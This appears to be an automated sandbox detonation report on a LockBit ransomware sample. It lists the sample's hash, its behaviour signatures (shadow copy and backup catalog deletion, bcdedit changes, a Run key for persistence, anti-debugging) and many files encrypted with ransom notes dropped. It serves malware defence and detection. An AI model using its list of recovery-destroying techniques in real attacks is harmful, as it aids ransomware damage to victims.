Malware Analysis Report

2024-11-30 11:30

Sample ID 240228-v5bf2shh5t
Target 2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit
SHA256 3a46534271954db3df6dcc13b13fc69c7f7cc95c0a6f59b46778299c4168c658
Tags
lockbit evasion persistence ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a46534271954db3df6dcc13b13fc69c7f7cc95c0a6f59b46778299c4168c658

Threat Level: Known bad

The file 2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit was found to be: Known bad.

Malicious Activity Summary

lockbit evasion persistence ransomware

Lockbit

Renames multiple (15610) files with added filename extension

Modifies boot configuration data using bcdedit

Deletes shadow copies

Deletes backup catalog

Enumerates connected drives

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-28 17:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-28 17:33

Reported

2024-02-28 17:39

Platform

win11-20240221-en

Max time kernel

270s

Max time network

285s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe"

Signatures

Lockbit

ransomware lockbit

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (15610) files with added filename extension

ransomware

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-627134735-902745853-4257352768-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe\"" C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\dynalink.md.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\wordmui.msi.16.en-us.vreg.dat.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sk.txt.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lv_get.svg.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.powerpointmui.msi.16.en-us.xml.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\OneNote\prnSendToOneNote_win7.inf.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\status.json.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\dotnet\ThirdPartyNotices.txt.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_es.properties.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Configuration\config.xml.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\sunjce_provider.jar.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nb-no\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_Trial-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-phn.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-pl.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\LibCurl64.DllA\OpenSSL64.DllA\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sk-sk\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_single_filetype.svg.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_gridview.svg.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons.png.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files\Microsoft Office\PackageManifests\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\shaded.dotx.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\sfodbc.did.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\jfr\profile.jfc.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\ShouldBeGreaterThan.snippets.ps1xml.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_unshare_18.svg.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-ul-oob.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\lv.txt.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Grace-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\ui-strings.js.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_PrepidBypass-ppd.xrm-ms.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\PROCDB.XLAM.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png.lockbit C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\Restore-My-Files.txt C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2024-02-28_5d066d873d1736570f2d10c182dfebd2_lockbit.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
